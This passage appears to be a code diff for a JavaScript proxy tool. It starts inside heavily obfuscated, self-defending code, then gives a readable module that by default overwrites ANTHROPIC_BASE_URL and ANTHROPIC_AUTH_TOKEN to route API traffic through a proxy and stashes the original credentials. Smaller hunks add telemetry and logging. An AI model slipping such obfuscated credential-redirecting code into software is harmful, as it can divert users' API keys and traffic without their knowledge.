_0x289397=-0x1589+0x22ff+-0xd76,_0x1ca59e,_0x467faf,_0x55002b=-0x20d5+0x1b2b+0x5aa;_0x467faf=_0x4c2dbb['\x63\x68\x61\x72\x41\x74'](_0x55002b++);~_0x467faf&&(_0x1ca59e=_0x289397%(0x1be3+-0x57b+0x1664*-0x1)?_0x1ca59e*(-0x189a+0x46f*-0x6+0x3374)+_0x467faf:_0x467faf,_0x289397++%(0xb*0xe5+-0x128c*-0x1+-0x1c5f))?_0x25a8da+=_0x277f23||_0x206bb4['\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74'](_0x55002b+(0x1*-0xeaf+-0x253d+0x5c6*0x9))-(0xa92+-0xd57*0x2+0x813*0x2)!==-0xff1+-0x1*0xaa1+0x1a92?String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](0x6e2+-0x9*-0x6e+-0xe3*0xb&_0x1ca59e>>(-(0x156a+0x39a*0x7+-0x2e9e)*_0x289397&0x1dbf+-0x1*-0x24e+0xaad*-0x3)):_0x289397:0xb78+-0x1c30+0x28*0x6b){_0x467faf=_0x564ca7['\x69\x6e\x64\x65\x78\x4f\x66'](_0x467faf);}for(let _0x39f8f8=0x270b+-0x1*-0x719+-0x2e24,_0x284d6b=_0x25a8da['\x6c\x65\x6e\x67\x74\x68'];_0x39f8f8<_0x284d6b;_0x39f8f8++){_0x42b0ae+='\x25'+('\x30\x30'+_0x25a8da['\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74'](_0x39f8f8)['\x74\x6f\x53\x74\x72\x69\x6e\x67'](-0xedd*-0x2+0x98b+-0x2735))['\x73\x6c\x69\x63\x65'](-(0x2689+-0x1c9c+-0x9eb));}return decodeURIComponent(_0x42b0ae);};const _0x1ad233=function(_0x481978,_0x1a9fee){let _0x150015=[],_0x33a3c3=-0x1*0xef9+-0x25*0x3b+-0x1780*-0x1,_0x4aa151,_0x4557f6='';_0x481978=_0x3f7ccc(_0x481978);let _0x276b5d;for(_0x276b5d=0x1*0x15e8+0xb08+0x1f*-0x110;_0x276b5d<0x1ebf+0x1*0x38b+-0x214a*0x1;_0x276b5d++){_0x150015[_0x276b5d]=_0x276b5d;}for(_0x276b5d=0x185e+0x10e4+-0x1*0x2942;_0x276b5d<-0x1d07+0x10*0x1a6+-0x11*-0x37;_0x276b5d++){_0x33a3c3=(_0x33a3c3+_0x150015[_0x276b5d]+_0x1a9fee['\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74'](_0x276b5d%_0x1a9fee['\x6c\x65\x6e\x67\x74\x68']))%(0x66c+0x907*0x2+-0x177a),_0x4aa151=_0x150015[_0x276b5d],_0x150015[_0x276b5d]=_0x150015[_0x33a3c3],_0x150015[_0x33a3c3]=_0x4aa151;}_0x276b5d=-0x1a81+0x1*0x4f3+0xb2*0x1f,_0x33a3c3=0x2cf*-0xa+0x21a*0xe+0x13*-0x12;for(let _0x2b9fa6=-0x1a3b+-0x692*-0x1+0x13a9;_0x2b9fa6<_0x481978['\x6c\x65\x6e\x67\x74\x68'];_0x2b9fa6++){_0x276b5d=(_0x276b5d+(0x2666+0x148*0x10+-0x3ae5))%(-0xf7*0x13+-0x16d0+0x2a25),_0x33a3c3=(_0x33a3c3+_0x150015[_0x276b5d])%(-0x51*0x44+-0xa7*-0x31+-0x973),_0x4aa151=_0x150015[_0x276b5d],_0x150015[_0x276b5d]=_0x150015[_0x33a3c3],_0x150015[_0x33a3c3]=_0x4aa151,_0x4557f6+=String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](_0x481978['\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74'](_0x2b9fa6)^_0x150015[(_0x150015[_0x276b5d]+_0x150015[_0x33a3c3])%(0x2*0x379+0x2378+-0x296a*0x1)]);}return _0x4557f6;};_0x5515['\x52\x65\x75\x74\x43\x52']=_0x1ad233,_0x5515['\x4e\x44\x6c\x67\x48\x67']={},_0x5515['\x4b\x56\x46\x4c\x79\x66']=!![];}const _0x20db68=_0x3962a1[-0x2*0x1283+-0x57a+-0x5*-0x880],_0x4c4fea=_0x4906de+_0x20db68,_0x5883e0=_0x5515['\x4e\x44\x6c\x67\x48\x67'][_0x4c4fea];if(!_0x5883e0){if(_0x5515['\x67\x67\x65\x59\x56\x77']===undefined){const _0x218b84=function(_0x44de23){this['\x4e\x6d\x58\x66\x75\x7a']=_0x44de23,this['\x69\x71\x50\x65\x72\x47']=[-0x2*-0x69e+-0x12d7+-0x2*-0x2ce,0x1352*-0x1+0x1*0x195c+-0x305*0x2,-0x283*0x1+-0x5de+0x861],this['\x6b\x50\x4a\x6f\x67\x5a']=function(){return'\x6e\x65\x77\x53\x74\x61\x74\x65';},this['\x53\x4d\x54\x4c\x42\x6e']='\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a',this['\x77\x53\x5a\x4d\x67\x78']='\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d';};_0x218b84['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x50\x64\x59\x58\x4f\x72']=function(){const _0x2e72dc=new RegExp(this['\x53\x4d\x54\x4c\x42\x6e']+this['\x77\x53\x5a\x4d\x67\x78']),_0x3a6c65=_0x2e72dc['\x74\x65\x73\x74'](this['\x6b\x50\x4a\x6f\x67\x5a']['\x74\x6f\x53\x74\x72\x69\x6e\x67']())?--this['\x69\x71\x50\x65\x72\x47'][0x1be*0x4+-0x5d5*0x1+0xa*-0x1d]:--this['\x69\x71\x50\x65\x72\x47'][-0xdca+-0x75f+-0x1*-0x1529];return this['\x65\x76\x6f\x50\x70\x4b'](_0x3a6c65);},_0x218b84['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x65\x76\x6f\x50\x70\x4b']=function(_0x4a8de8){if(!Boolean(~_0x4a8de8))return _0x4a8de8;return this['\x63\x5a\x4a\x64\x53\x68'](this['\x4e\x6d\x58\x66\x75\x7a']);},_0x218b84['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x63\x5a\x4a\x64\x53\x68']=function(_0x5cfbf8){for(let _0x47109a=0xa*-0x134+0x1a0*0xd+-0x918,_0x3fc8b7=this['\x69\x71\x50\x65\x72\x47']['\x6c\x65\x6e\x67\x74\x68'];_0x47109a<_0x3fc8b7;_0x47109a++){this['\x69\x71\x50\x65\x72\x47']['\x70\x75\x73\x68'](Math['\x72\x6f\x75\x6e\x64'](Math['\x72\x61\x6e\x64\x6f\x6d']())),_0x3fc8b7=this['\x69\x71\x50\x65\x72\x47']['\x6c\x65\x6e\x67\x74\x68'];}return _0x5cfbf8(this['\x69\x71\x50\x65\x72\x47'][-0xf32+-0x2*0x37d+0x162c]);},(''+function(){return-0xb85+0x435*-0x1+0xfba;})['\x69\x6e\x64\x65\x78\x4f\x66']('\x0a')===-(0x12ed+-0xcd9+-0x137*0x5)&&new _0x218b84(_0x5515)['\x50\x64\x59\x58\x4f\x72'](),_0x5515['\x67\x67\x65\x59\x56\x77']=!![];}_0x5a6226=_0x5515['\x52\x65\x75\x74\x43\x52'](_0x5a6226,_0x5e61c6),_0x5515['\x4e\x44\x6c\x67\x48\x67'][_0x4c4fea]=_0x5a6226;}else _0x5a6226=_0x5883e0;return _0x5a6226;}(function(_0x2270cb,_0x3d8412){const _0x5c7a02=_0x5515,_0x13e354=_0x2270cb();while(!![]){try{const _0x18aa61=-parseInt(_0x5c7a02(0x1de,'\x71\x21\x74\x46'))/(0x24*-0x9b+0x85a+0xb*0x139)+parseInt(_0x5c7a02(0x1dc,'\x30\x4b\x5a\x6c'))/(0x1eb5+-0x15f9+-0x2*0x45d)+-parseInt(_0x5c7a02(0x227,'\x79\x4f\x6a\x63'))/(-0x73e+-0x2e1*-0xb+-0xa*0x271)+-parseInt(_0x5c7a02(0x223,'\x34\x6e\x43\x50'))/(0x2420+0x1559+-0x3975)*(-parseInt(_0x5c7a02(0x1a8,'\x4c\x40\x44\x41'))/(-0x73*0x39+-0x4a9*0x7+-0x3a3f*-0x1))+parseInt(_0x5c7a02(0x1c3,'\x47\x6a\x65\x2a'))/(-0x6e*0x2b+0x124*-0x3+0x2e*0x7a)*(-parseInt(_0x5c7a02(0x206,'\x51\x7a\x5a\x4d'))/(-0xf91+-0x6b5*0x1+0x164d))+parseInt(_0x5c7a02(0x232,'\x76\x55\x35\x4a'))/(-0x16df+0x14*-0x179+0x407*0xd)*(-parseInt(_0x5c7a02(0x1ec,'\x65\x55\x59\x38'))/(0x1632+-0x29*0x8c+0x43))+-parseInt(_0x5c7a02(0x214,'\x4c\x40\x44\x41'))/(0x7*-0x1cf+0x12ee+-0x63b)*(-parseInt(_0x5c7a02(0x1c9,'\x4b\x4f\x49\x49'))/(-0x3*0x7e3+0x7*0x23b+0x817));if(_0x18aa61===_0x3d8412)break;else _0x13e354['push'](_0x13e354['shift']());}catch(_0x153b4f){_0x13e354['push'](_0x13e354['shift']());}}}(_0x3f94,-0x1559f6+-0x2b9c*-0x4a+0x16b72b));const _0x18706b=(function(){const _0x903d77=_0x5515,_0x479801={};_0x479801[_0x903d77(0x1e8,'\x76\x65\x40\x56')]=_0x903d77(0x213,'\x29\x76\x57\x6a')+_0x903d77(0x1c8,'\x47\x56\x46\x39')+_0x903d77(0x1ef,'\x4c\x40\x44\x41'),_0x479801[_0x903d77(0x204,'\x62\x78\x70\x6a')]='\x69\x6b\x46\x54\x68',_0x479801[_0x903d77(0x1e5,'\x66\x74\x72\x76')]=_0x903d77(0x1d4,'\x4e\x4d\x33\x51');const _0x4b0917=_0x479801;let _0x5a7ca7=!![];return function(_0x2fa350,_0x22c869){const _0x621f1e=_0x903d77;if(_0x4b0917[_0x621f1e(0x1e9,'\x6d\x75\x50\x73')]===_0x4b0917[_0x621f1e(0x229,'\x29\x56\x37\x30')]){const _0x24d239={};return _0x24d239[_0x621f1e(0x1ac,'\x43\x52\x21\x23')]=![],_0x24d239[_0x621f1e(0x215,'\x66\x74\x72\x76')]=_0x4b0917[_0x621f1e(0x20b,'\x63\x24\x61\x7a')],_0x24d239;}else{const _0x598f7b=_0x5a7ca7?function(){const _0x3d6621=_0x621f1e;if(_0x22c869){const _0x177d76=_0x22c869[_0x3d6621(0x1d2,'\x5b\x25\x40\x53')](_0x2fa350,arguments);return _0x22c869=null,_0x177d76;}}:function(){};return _0x5a7ca7=![],_0x598f7b;}};}()),_0x32d896=_0x18706b(this,function(){const _0x2b7384=_0x5515,_0x595471={};_0x595471[_0x2b7384(0x1d9,'\x30\x4b\x5a\x6c')]=_0x2b7384(0x1f9,'\x6a\x6c\x52\x67')+_0x2b7384(0x1b0,'\x51\x7a\x5a\x4d');const _0x3deae0=_0x595471;return _0x32d896['\x74\x6f\x53\x74\x72\x69\x6e\x67']()[_0x2b7384(0x1ff,'\x4b\x43\x5b\x2a')](_0x3deae0[_0x2b7384(0x1c7,'\x47\x6a\x65\x2a')])[_0x2b7384(0x20c,'\x76\x55\x35\x4a')]()[_0x2b7384(0x1e3,'\x67\x39\x52\x71')+_0x2b7384(0x1a5,'\x62\x78\x70\x6a')](_0x32d896)[_0x2b7384(0x1e6,'\x74\x63\x46\x79')](_0x3deae0[_0x2b7384(0x1da,'\x62\x45\x71\x50')]);});_0x32d896();'use strict';const {getProxyToken:_0x374310,getProxyUrl:_0x236d3d}=require(_0x582b27(0x207,'\x79\x4f\x6a\x63')+'\x2f\x73\x65\x74\x74\x69\x6e\x67'+'\x73');function _0x3ed549(_0x38c464=process.env){const _0x4a6ad6=_0x582b27,_0x24d743={'\x52\x65\x6e\x6b\x46':function(_0x22c008,_0x2d93a2){return _0x22c008(_0x2d93a2);},'\x6b\x76\x45\x58\x46':function(_0x3ba215,_0x32ee78){return _0x3ba215===_0x32ee78;},'\x61\x62\x77\x57\x76':function(_0x3fe3e1,_0x3d92af){return _0x3fe3e1===_0x3d92af;},'\x78\x49\x6e\x4e\x78':_0x4a6ad6(0x231,'\x73\x4f\x6d\x79'),'\x72\x6e\x51\x46\x59':function(_0x5f2808,_0x4a0d80){return _0x5f2808===_0x4a0d80;},'\x41\x68\x79\x77\x43':'\x6f\x66\x66','\x5a\x53\x5a\x64\x4d':'\x6e\x6f\x6e\x65'},_0x1620c5=_0x24d743['\x52\x65\x6e\x6b\x46'](String,_0x38c464[_0x4a6ad6(0x225,'\x6a\x55\x31\x51')+'\x52\x4f\x58\x59\x5f\x41\x55\x54'+_0x4a6ad6(0x1fa,'\x34\x6e\x43\x50')]||'')[_0x4a6ad6(0x1b9,'\x29\x76\x57\x6a')]()[_0x4a6ad6(0x202,'\x4f\x44\x36\x49')+_0x4a6ad6(0x1c5,'\x79\x64\x2a\x5e')]();return _0x24d743[_0x4a6ad6(0x235,'\x73\x4f\x6d\x79')](_0x1620c5,'\x30')||_0x24d743[_0x4a6ad6(0x219,'\x67\x39\x52\x71')](_0x1620c5,_0x24d743[_0x4a6ad6(0x1b4,'\x76\x65\x40\x56')])||_0x24d743[_0x4a6ad6(0x1ca,'\x32\x4b\x56\x47')](_0x1620c5,_0x24d743[_0x4a6ad6(0x1bb,'\x35\x5e\x74\x4a')])||_0x24d743[_0x4a6ad6(0x219,'\x67\x39\x52\x71')](_0x1620c5,_0x24d743[_0x4a6ad6(0x20f,'\x79\x4f\x6a\x63')])||_0x24d743[_0x4a6ad6(0x1b3,'\x6d\x75\x50\x73')](_0x1620c5,'\x6e\x6f');}function _0x5b0ac1(_0xe29bea={},_0x326e10=process.env){const _0x2feda9=_0x582b27,_0x3a4dbc={'\x76\x72\x44\x74\x7a':_0x2feda9(0x1f3,'\x26\x7a\x46\x45'),'\x5a\x62\x58\x49\x72':'\x28\x28\x28\x2e\x2b\x29\x2b\x29'+_0x2feda9(0x21e,'\x5b\x25\x40\x53'),'\x55\x46\x76\x4e\x6f':function(_0x419af7,_0x3e00f6){return _0x419af7(_0x3e00f6);},'\x4f\x4c\x76\x78\x73':function(_0x3ba03e,_0x1ac667){return _0x3ba03e===_0x1ac667;},'\x46\x4f\x59\x4d\x49':_0x2feda9(0x20a,'\x47\x6a\x65\x2a'),'\x6c\x4e\x49\x62\x68':_0x2feda9(0x211,'\x35\x5e\x74\x4a'),'\x57\x6a\x4c\x51\x4f':function(_0x2e9e9,_0xc787d2){return _0x2e9e9===_0xc787d2;},'\x62\x43\x56\x4e\x61':function(_0x3e34d5,_0x108d02){return _0x3e34d5!==_0x108d02;},'\x4a\x49\x51\x50\x79':function(_0x407ebd){return _0x407ebd();},'\x44\x50\x6b\x6d\x6f':function(_0x3a77d9,_0x330934){return _0x3a77d9||_0x330934;},'\x62\x7a\x63\x53\x4c':'\x65\x45\x43\x65\x52','\x6f\x55\x54\x51\x4e':_0x2feda9(0x1cf,'\x50\x4d\x26\x73'),'\x64\x6f\x48\x53\x75':_0x2feda9(0x1d1,'\x6c\x72\x36\x36')+_0x2feda9(0x21a,'\x65\x55\x59\x38')+'\x74\x74\x69\x6e\x67\x73','\x73\x71\x4f\x70\x57':function(_0x1b306c,_0x5f1844){return _0x1b306c(_0x5f1844);},'\x48\x66\x74\x74\x4b':_0x2feda9(0x1af,'\x4b\x43\x5b\x2a'),'\x6c\x46\x66\x6c\x68':'\x41\x4e\x54\x48\x52\x4f\x50\x49'+_0x2feda9(0x1db,'\x29\x76\x57\x6a')+'\x52\x4c','\x4c\x42\x73\x51\x70':_0x2feda9(0x1df,'\x6c\x72\x36\x36')+_0x2feda9(0x236,'\x5b\x25\x40\x53')+_0x2feda9(0x21c,'\x74\x63\x46\x79'),'\x6b\x6b\x46\x55\x58':'\x45\x56\x4f\x4d\x41\x50\x5f\x50'+_0x2feda9(0x1e2,'\x65\x55\x59\x38')};if(_0x3a4dbc[_0x2feda9(0x1fd,'\x43\x52\x21\x23')](_0x3ed549,_0x326e10)){if(_0x3a4dbc['\x4f\x4c\x76\x78\x73'](_0x3a4dbc['\x46\x4f\x59\x4d\x49'],_0x3a4dbc[_0x2feda9(0x1b8,'\x5b\x25\x40\x53')])){const _0x5343b7={};return _0x5343b7[_0x2feda9(0x22f,'\x34\x6e\x43\x50')]=![],_0x5343b7[_0x2feda9(0x1c6,'\x6b\x4a\x5e\x28')]=_0x3a4dbc[_0x2feda9(0x217,'\x62\x78\x63\x63')],_0x5343b7;}else{const _0x8e391b={};return _0x8e391b['\x69\x6e\x6a\x65\x63\x74\x65\x64']=![],_0x8e391b[_0x2feda9(0x1ea,'\x76\x65\x40\x56')]=_0x3a4dbc[_0x2feda9(0x21f,'\x4f\x44\x36\x49')],_0x8e391b;}}const _0x1cb4f1=_0x3a4dbc[_0x2feda9(0x205,'\x4e\x4d\x33\x51')](_0x326e10,process.env)&&_0x3a4dbc['\x62\x43\x56\x4e\x61'](_0xe29bea[_0x2feda9(0x1ed,'\x67\x39\x52\x71')+_0x2feda9(0x1f1,'\x62\x45\x71\x50')],![]),_0x54b93a=_0x3a4dbc[_0x2feda9(0x1fc,'\x38\x31\x45\x25')](String,_0xe29bea['\x75\x72\x6c']||(_0x1cb4f1?_0x3a4dbc[_0x2feda9(0x1bc,'\x4d\x38\x57\x2a')](_0x236d3d):'')||'')[_0x2feda9(0x220,'\x4f\x44\x36\x49')](/\/+$/,''),_0x40ab9b=_0x3a4dbc['\x55\x46\x76\x4e\x6f'](String,_0xe29bea[_0x2feda9(0x1a9,'\x51\x7a\x5a\x4d')]||(_0x1cb4f1?_0x3a4dbc[_0x2feda9(0x1ba,'\x50\x4d\x26\x73')](_0x374310):'')||'');if(_0x3a4dbc[_0x2feda9(0x224,'\x51\x7a\x5a\x4d')](!_0x54b93a,!_0x40ab9b)){if(_0x3a4dbc[_0x2feda9(0x1e4,'\x6b\x4a\x5e\x28')](_0x3a4dbc[_0x2feda9(0x20e,'\x29\x6e\x79\x23')],_0x3a4dbc[_0x2feda9(0x233,'\x49\x48\x4d\x40')]))return _0xb18fc2[_0x2feda9(0x201,'\x66\x74\x72\x76')]()[_0x2feda9(0x1b1,'\x62\x78\x63\x63')](_0x2feda9(0x20d,'\x49\x48\x4d\x40')+_0x2feda9(0x1ab,'\x34\x6e\x43\x50'))[_0x2feda9(0x1dd,'\x5b\x25\x40\x53')]()[_0x2feda9(0x1e3,'\x67\x39\x52\x71')+_0x2feda9(0x1f7,'\x76\x55\x35\x4a')](_0x3f4f22)[_0x2feda9(0x1ff,'\x4b\x43\x5b\x2a')](trOQFY[_0x2feda9(0x1d5,'\x36\x28\x44\x48')]);else{const _0x465ace={};return _0x465ace[_0x2feda9(0x1ad,'\x49\x48\x4d\x40')]=![],_0x465ace[_0x2feda9(0x1aa,'\x55\x4f\x4e\x53')]=_0x3a4dbc['\x64\x6f\x48\x53\x75'],_0x465ace;}}const _0x4db452=_0x3a4dbc[_0x2feda9(0x203,'\x5b\x25\x40\x53')](String,_0x326e10[_0x2feda9(0x221,'\x67\x39\x52\x71')+_0x2feda9(0x1d8,'\x71\x21\x74\x46')+'\x52\x4c']||'')[_0x2feda9(0x1a6,'\x50\x4d\x26\x73')]()[_0x2feda9(0x212,'\x79\x4f\x6a\x63')](/\/+$/,'');_0x4db452&&_0x4db452!==_0x54b93a&&!_0x326e10[_0x2feda9(0x1cd,'\x65\x55\x59\x38')+_0x2feda9(0x216,'\x67\x39\x52\x71')+_0x2feda9(0x1c0,'\x47\x73\x79\x6e')+'\x4c']&&(_0x3a4dbc[_0x2feda9(0x1e1,'\x51\x7a\x5a\x4d')](_0x2feda9(0x1ee,'\x76\x55\x35\x4a'),_0x3a4dbc[_0x2feda9(0x1b5,'\x79\x64\x2a\x5e')])?_0x27f47d[_0x2feda9(0x210,'\x66\x74\x72\x76')+'\x4e\x54\x48\x52\x4f\x50\x49\x43'+'\x5f\x41\x55\x54\x48\x5f\x54\x4f'+'\x4b\x45\x4e']=_0x24a9a1:_0x326e10[_0x2feda9(0x1d7,'\x62\x78\x70\x6a')+'\x4e\x54\x48\x52\x4f\x50\x49\x43'+'\x5f\x42\x41\x53\x45\x5f\x55\x52'+'\x4c']=_0x4db452);const _0x4c2578=_0x3a4dbc[_0x2feda9(0x1d0,'\x6d\x75\x50\x73')](String,_0x326e10[_0x2feda9(0x1fb,'\x26\x7a\x46\x45')+_0x2feda9(0x1e7,'\x49\x48\x4d\x40')+_0x2feda9(0x1d6,'\x49\x51\x4d\x69')]||'')[_0x2feda9(0x234,'\x6d\x75\x50\x73')]();_0x4c2578&&_0x3a4dbc[_0x2feda9(0x1b2,'\x55\x4f\x4e\x53')](_0x4c2578,_0x40ab9b)&&!_0x326e10[_0x2feda9(0x209,'\x4c\x40\x44\x41')+_0x2feda9(0x228,'\x6c\x72\x36\x36')+'\x5f\x41\x55\x54\x48\x5f\x54\x4f'+'\x4b\x45\x4e']&&(_0x326e10['\x45\x56\x4f\x4d\x41\x50\x5f\x41'+_0x2feda9(0x22e,'\x76\x55\x35\x4a')+_0x2feda9(0x1ce,'\x29\x76\x57\x6a')+_0x2feda9(0x1be,'\x32\x59\x6f\x25')]=_0x4c2578);_0x326e10[_0x2feda9(0x22a,'\x4c\x74\x2a\x47')+_0x2feda9(0x200,'\x5e\x6d\x42\x44')+'\x52\x4c']=_0x54b93a,_0x326e10[_0x2feda9(0x1eb,'\x29\x56\x37\x30')+_0x2feda9(0x1f5,'\x51\x7a\x5a\x4d')+_0x2feda9(0x1a7,'\x73\x4f\x6d\x79')]=_0x40ab9b,_0x326e10[_0x2feda9(0x222,'\x51\x7a\x5a\x4d')+_0x2feda9(0x1b6,'\x43\x52\x21\x23')]=_0x40ab9b,_0x326e10[_0x2feda9(0x218,'\x62\x78\x63\x63')+_0x2feda9(0x1f6,'\x63\x24\x61\x7a')]=_0x54b93a,_0x326e10[_0x2feda9(0x22d,'\x67\x39\x52\x71')+_0x2feda9(0x1f0,'\x67\x39\x52\x71')+_0x2feda9(0x21b,'\x29\x6e\x79\x23')+'\x45\x44']='\x31';const _0x5b6990={};return _0x5b6990[_0x2feda9(0x208,'\x38\x31\x45\x25')]=!![],_0x5b6990[_0x2feda9(0x1c4,'\x4e\x4d\x33\x51')]=_0x54b93a,_0x5b6990[_0x2feda9(0x1e0,'\x26\x7a\x46\x45')]=[_0x3a4dbc[_0x2feda9(0x1d3,'\x74\x63\x46\x79')],_0x3a4dbc[_0x2feda9(0x1f2,'\x76\x65\x40\x56')],_0x2feda9(0x1b7,'\x4b\x43\x5b\x2a')+_0x2feda9(0x1cb,'\x4f\x44\x36\x49'),_0x3a4dbc[_0x2feda9(0x230,'\x62\x78\x70\x6a')]],_0x5b6990;}const _0x334401={};_0x334401[_0x582b27(0x1bf,'\x47\x56\x46\x39')+_0x582b27(0x1bd,'\x71\x21\x74\x46')]=_0x5b0ac1,_0x334401[_0x582b27(0x1fe,'\x62\x78\x63\x63')+'\x65\x64']=_0x3ed549,module[_0x582b27(0x1f8,'\x62\x45\x71\x50')]=_0x334401;
|
|
1
|
+
'use strict';
|
|
2
|
+
|
|
3
|
+
const { getProxyToken, getProxyUrl } = require('./server/settings');
|
|
4
|
+
|
|
5
|
+
function isDisabled(env = process.env) {
|
|
6
|
+
const raw = String(env.EVOMAP_PROXY_AUTO_INJECT || '').trim().toLowerCase();
|
|
7
|
+
return raw === '0' || raw === 'false' || raw === 'off' || raw === 'none' || raw === 'no';
|
|
8
|
+
}
|
|
9
|
+
|
|
10
|
+
function injectProxyEnv(info = {}, env = process.env) {
|
|
11
|
+
if (isDisabled(env)) {
|
|
12
|
+
return { injected: false, reason: 'disabled' };
|
|
13
|
+
}
|
|
14
|
+
|
|
15
|
+
const useSettingsFallback = env === process.env && info.useSettings !== false;
|
|
16
|
+
const url = String(info.url || (useSettingsFallback ? getProxyUrl() : '') || '').replace(/\/+$/, '');
|
|
17
|
+
const token = String(info.token || (useSettingsFallback ? getProxyToken() : '') || '');
|
|
18
|
+
if (!url || !token) {
|
|
19
|
+
return { injected: false, reason: 'missing_proxy_settings' };
|
|
20
|
+
}
|
|
21
|
+
|
|
22
|
+
const currentBase = String(env.ANTHROPIC_BASE_URL || '').trim().replace(/\/+$/, '');
|
|
23
|
+
if (currentBase && currentBase !== url && !env.EVOMAP_ANTHROPIC_BASE_URL) {
|
|
24
|
+
env.EVOMAP_ANTHROPIC_BASE_URL = currentBase;
|
|
25
|
+
}
|
|
26
|
+
const currentAuthToken = String(env.ANTHROPIC_AUTH_TOKEN || '').trim();
|
|
27
|
+
if (currentAuthToken && currentAuthToken !== token && !env.EVOMAP_ANTHROPIC_AUTH_TOKEN) {
|
|
28
|
+
env.EVOMAP_ANTHROPIC_AUTH_TOKEN = currentAuthToken;
|
|
29
|
+
}
|
|
30
|
+
|
|
31
|
+
env.ANTHROPIC_BASE_URL = url;
|
|
32
|
+
env.ANTHROPIC_AUTH_TOKEN = token;
|
|
33
|
+
env.CUSTOM_API_KEY = token;
|
|
34
|
+
env.EVOMAP_PROXY_URL = url;
|
|
35
|
+
env.EVOMAP_PROXY_AUTO_INJECTED = '1';
|
|
36
|
+
|
|
37
|
+
return {
|
|
38
|
+
injected: true,
|
|
39
|
+
url,
|
|
40
|
+
vars: [
|
|
41
|
+
'ANTHROPIC_BASE_URL',
|
|
42
|
+
'ANTHROPIC_AUTH_TOKEN',
|
|
43
|
+
'CUSTOM_API_KEY',
|
|
44
|
+
'EVOMAP_PROXY_URL',
|
|
45
|
+
],
|
|
46
|
+
};
|
|
47
|
+
}
|
|
48
|
+
|
|
49
|
+
module.exports = {
|
|
50
|
+
injectProxyEnv,
|
|
51
|
+
isDisabled,
|
|
52
|
+
};
|
|
@@ -761,6 +761,25 @@ class LifecycleManager {
|
|
|
761
761
|
},
|
|
762
762
|
};
|
|
763
763
|
|
|
764
|
+
try {
|
|
765
|
+
const cfg = require('../../config');
|
|
766
|
+
if (cfg.antiAbuseTelemetryMode && cfg.antiAbuseTelemetryMode() === 'heartbeat') {
|
|
767
|
+
const { buildHeartbeatAntiAbuseTelemetry } = require('../../gep/antiAbuseTelemetry');
|
|
768
|
+
body.meta.anti_abuse = buildHeartbeatAntiAbuseTelemetry({
|
|
769
|
+
source: 'evolver-proxy',
|
|
770
|
+
nodeId: this.nodeId,
|
|
771
|
+
envFingerprint: fp,
|
|
772
|
+
taskMeta: body.meta,
|
|
773
|
+
// This heartbeat is sent FROM the running proxy — ground truth,
|
|
774
|
+
// not env sniffing (this process usually has neither EVOMAP_PROXY
|
|
775
|
+
// nor EVOMAP_PROXY_PORT set, which would misreport false).
|
|
776
|
+
proxyPortConfigured: true,
|
|
777
|
+
});
|
|
778
|
+
}
|
|
779
|
+
} catch (e) {
|
|
780
|
+
this.logger.warn(`[AntiAbuseTelemetry] failed to build heartbeat summary: ${e && e.message || e}`);
|
|
781
|
+
}
|
|
782
|
+
|
|
764
783
|
// Attach any pending force_update outcome so the hub-side
|
|
765
784
|
// EvolverUpgradeAttempt table gets a row. Captured in a local so the
|
|
766
785
|
// post-2xx clear matches identity (rotation-safe — see
|
|
@@ -387,7 +387,7 @@ class MailboxStore {
|
|
|
387
387
|
return all.slice(skip, skip + max).map(m => ({ ...m }));
|
|
388
388
|
}
|
|
389
389
|
|
|
390
|
-
countPending({ direction, channel } = {}) {
|
|
390
|
+
countPending({ direction, channel, type } = {}) {
|
|
391
391
|
const dir = direction || 'outbound';
|
|
392
392
|
let count = 0;
|
|
393
393
|
const idList = dir === 'outbound' ? this._outbound : this._inbound;
|
|
@@ -395,6 +395,7 @@ class MailboxStore {
|
|
|
395
395
|
const msg = this._messages.get(id);
|
|
396
396
|
if (!msg || msg.status !== 'pending') continue;
|
|
397
397
|
if (channel && msg.channel !== channel) continue;
|
|
398
|
+
if (type && msg.type !== type) continue;
|
|
398
399
|
count++;
|
|
399
400
|
}
|
|
400
401
|
return count;
|
|
@@ -104,7 +104,7 @@ function resolveTierModels() {
|
|
|
104
104
|
};
|
|
105
105
|
}
|
|
106
106
|
|
|
107
|
-
function buildMessagesHandler({ anthropicProxy, logger, routerEnabled, traceStore } = {}) {
|
|
107
|
+
function buildMessagesHandler({ anthropicProxy, logger, routerEnabled, traceStore, onTraceQueued } = {}) {
|
|
108
108
|
if (typeof anthropicProxy !== 'function') {
|
|
109
109
|
throw new Error('buildMessagesHandler requires anthropicProxy(path, body, opts)');
|
|
110
110
|
}
|
|
@@ -278,6 +278,8 @@ function buildMessagesHandler({ anthropicProxy, logger, routerEnabled, traceStor
|
|
|
278
278
|
originalModel,
|
|
279
279
|
chosenModel,
|
|
280
280
|
store: traceStore,
|
|
281
|
+
logger: traceStore ? log : null,
|
|
282
|
+
onTraceQueued,
|
|
281
283
|
});
|
|
282
284
|
} catch (_) { /* best-effort trace; never break the request */ }
|
|
283
285
|
|
|
@@ -450,7 +452,8 @@ function buildMessagesHandler({ anthropicProxy, logger, routerEnabled, traceStor
|
|
|
450
452
|
event: 'router_fallback',
|
|
451
453
|
reason: 'upstream_non_json',
|
|
452
454
|
upstream_status: finalUpstream.status,
|
|
453
|
-
|
|
455
|
+
content_type: finalUpstream.headers && finalUpstream.headers['content-type'] || '',
|
|
456
|
+
response_bytes: Buffer.byteLength(raw),
|
|
454
457
|
}));
|
|
455
458
|
}
|
|
456
459
|
}
|